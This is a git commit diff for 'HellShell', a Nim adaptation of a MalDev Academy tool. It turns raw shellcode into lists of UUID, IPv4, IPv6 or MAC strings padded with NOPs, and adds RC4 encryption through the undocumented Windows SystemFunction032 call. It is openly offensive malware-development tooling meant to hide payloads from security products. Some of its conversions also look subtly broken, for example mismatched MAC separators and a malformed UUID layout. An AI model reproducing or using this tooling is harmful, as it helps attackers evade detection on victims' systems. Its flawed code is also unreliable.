first

Connor MacLeod · Connor MacLeod · commit a79c63776ccd · 2023-12-25T22:46:31.000-05:00
diff --git a/.gitignore b/.gitignore
@@ -0,0 +1,4 @@
+*.exe
+nimcache/
+nimblecache/
+htmldocs/
diff --git a/HellShell.nimble b/HellShell.nimble
@@ -0,0 +1,15 @@
+# Package
+
+version       = "0.1.0"
+author        = "0xC130D"
+description   = "A Nim adaptation of HellShell from MalDev Academy"
+license       = "GPL-2.0-or-later"
+srcDir        = "src"
+installExt    = @["nim"]
+bin           = @["HellShell"]
+
+
+# Dependencies
+
+requires "nim >= 2.0.0"
+requires "cligen >= 1.6.16"
diff --git a/src/HellShell.nim b/src/HellShell.nim
@@ -0,0 +1,36 @@
+import HellShellpkg / [ ioutils, obfuscation ]
+import std/strutils
+
+type
+  Operations = enum
+    UUID = "uuid", 
+    IPv4 = "ipv4", 
+    IPv6 = "ipv6", 
+    MAC = "mac"
+
+
+when isMainModule:
+  proc argParser(obfuscation: Operations, filename: string, outfile:string = "stdout") =
+    var 
+      shellcode: seq[uint8] = filename.readFileToBytes()
+      obfuscated: seq[string]
+    case obfuscation:
+      of UUID:
+        obfuscated = shellcode.toUUIDs
+      of IPv4:
+        obfuscated = shellcode.toIPv4
+      of IPv6:
+        obfuscated = shellcode.toIPv6
+      of MAC:
+        obfuscated = shellcode.toMAC
+    
+    if outfile == "stdout":
+      stdout.write(obfuscated.join("\n"))
+    else:
+      outfile.writeFile(obfuscated.join("\n"))
+    
+  import cligen; dispatch argParser, help={
+    "obfuscation": "one of: uuid, ipv4, ipv6, mac", 
+    "filename": "a file to read from", 
+    "outfile": "file to write results to"},
+    short={"obfuscation": 't'}
diff --git a/src/HellShellpkg/encryption.nim b/src/HellShellpkg/encryption.nim
@@ -0,0 +1,37 @@
+{.push raises: [].}
+import std/random
+import winim
+
+
+type 
+    USTRING = object
+        Length, MaximumLength: DWORD
+        Buffer: PVOID
+
+proc makeRandomBytes(i: int): seq[uint8] =
+    for k in 0 .. i:
+        result.add(rand(255).uint8)
+
+proc rc4EncryptNTAPI(data, key: PTR): NTSTATUS
+    {.discardable, stdcall, dynlib: "Advapi32", importc: "SystemFunction032"}
+
+proc rc4Encrypt*(key, payload: seq[uint8], winapi: bool): string {.raises: [OSError].} =
+    if winapi:
+        var
+            winPayload = payload # need a deep copy because of in-place memory modification
+            key = USTRING(
+                Length: cast[int32](key.len),
+                MaximumLength: cast[int32](key.len),
+                Buffer: key.addr # can't use `ptr` because it is a generic
+            )
+            data = USTRING(
+                Length: cast[int32](winPayload.len),
+                MaximumLength: cast[int32](winPayload.len),
+                Buffer: winPayload.addr
+            )
+            status = rc4EncryptNTAPI(data.addr, key.addr)
+        if not status.NT_SUCCESS:
+            echo &"[-] Encryption failed with code: {status}"
+            raise newException(OSError, "Encryption failed using NTAPI")
+        
+        result = $data
diff --git a/src/HellShellpkg/ioutils.nim b/src/HellShellpkg/ioutils.nim
@@ -0,0 +1,9 @@
+import std / [ streams, sequtils ]
+
+proc readFileToBytes*(fileLocation: string, ): seq[uint8] =
+    let hFile = newFileStream(fileLocation)
+    defer: hFile.close()
+    result = result.toSeq()
+    while not hFile.atEnd():
+        result.add(hFile.readUint8())
+
diff --git a/src/HellShellpkg/obfuscation.nim b/src/HellShellpkg/obfuscation.nim
@@ -0,0 +1,63 @@
+import std/[sequtils,strformat,strutils, sugar]
+
+
+proc toEvenHex(bytes: seq[uint8], sizeNeeded: int8): seq[string] =
+    let 
+        hex = bytes.toSeq.mapIt(it.toHex.toLower)
+        remainder = sizeNeeded - hex.len.mod(sizeNeeded)
+        padding = @["90"].cycle(remainder)
+    writeLine(stderr, &"[*] Shellcode is {hex.len} bytes, adding {remainder} NOPs to make UUIDs")
+    
+    return concat(padding, hex) # add NOP sled to make the sequence evenly devisible
+    
+
+proc toUUIDs*(bytes: seq[uint8]): seq[string] =
+    let hex = bytes.toEvenHex(16)
+    result = collect:
+        for i in countup(0, hex.len-16, 16):
+            let uuidGroups = hex[i ..< i+16].distribute(4)
+            &"{uuidGroups[0].join}-{uuidGroups[1].join}-{uuidGroups[2].join}{uuidGroups[3].join}"
+
+proc fromUUID*(uuid: string): seq[uint8] =
+    let bytes = uuid
+        .filterIt(it != '-')
+        .distribute(16)
+        .mapIt(fromHex[uint8](join(it)))
+    result = collect(newSeq):
+        for b in bytes: b
+
+proc toMAC*(bytes: seq[uint8]): seq[string] =
+    let hex = bytes.toEvenHex(8)
+    for i in countup(0, hex.len-8, 8):
+        let mac = hex[i ..< i+8].join("-")
+        result.add(mac)
+
+proc fromMAC*(mac: string): seq[uint8] =
+    result = mac.split(".").mapIt(cast[uint8](it.parseUInt))
+
+proc toIPv6*(bytes: seq[uint8]): seq[string] =
+    let hex = bytes.toEvenHex(16)
+    result = collect:
+        for i in countup(0, hex.len-16, 16):
+            let uuidGroups = hex[i ..< i+16].distribute(4)
+            join(uuidGroups.mapIt(join(it)),":")
+            #let uuid = &"{uuidGroups[0].join(":")}:{uuidGroups[1].join(":")}:{uuidGroups[2].join(":")}{uuidGroups[3].join(":")}"
+
+proc fromIPv6*(ipv6: string): seq[uint8] =
+    let bytes = ipv6
+        .filterIt(it != ':')
+        .distribute(16)
+        .mapIt(fromHex[uint8](join(it)))
+    result = collect:
+        for b in bytes: b
+
+proc toIPv4*(bytes: seq[uint8]): seq[string] =
+    let 
+        remainder = 4 - bytes.len.mod(4)
+        buffer = @[144'u8].cycle(remainder) # 144d = 90h (NOP)
+        alignedBytes = concat(buffer, bytes)
+    for i in countup(0, alignedBytes.len-4, 4):
+        result.add(alignedBytes[i ..< i+4].join("."))
+
+proc fromIPv4*(ipv4: string): seq[uint8] =
+    result = ipv4.split(".").mapIt(cast[uint8](it.parseUInt))
diff --git a/tests/config.nims b/tests/config.nims
@@ -0,0 +1 @@
+switch("path", "$projectDir/../src")
diff --git a/tests/shellcode.bin b/tests/shellcode.bin
diff --git a/tests/test1.nim b/tests/test1.nim
@@ -0,0 +1,16 @@
+# This is just an example to get you started. You may wish to put all of your
+# tests into a single file, or separate them into multiple `test1`, `test2`
+# etc. files (better names are recommended, just make sure the name starts with
+# the letter 't').
+#
+# To run these tests, simply execute `nimble test`.
+
+import unittest, sequtils
+
+import ../src/HellShellpkg/[obfuscation, ioutils]
+
+test "to and from are the same":
+  let 
+    shellcode = "tests/shellcode.bin".readFileToBytes()
+    transformed = shellcode.toUUIDs.map(fromUUID).foldl(a & b)
+  check transformed[transformed.len-shellcode.len .. ^1] == shellcode # have to slice off the NOPs
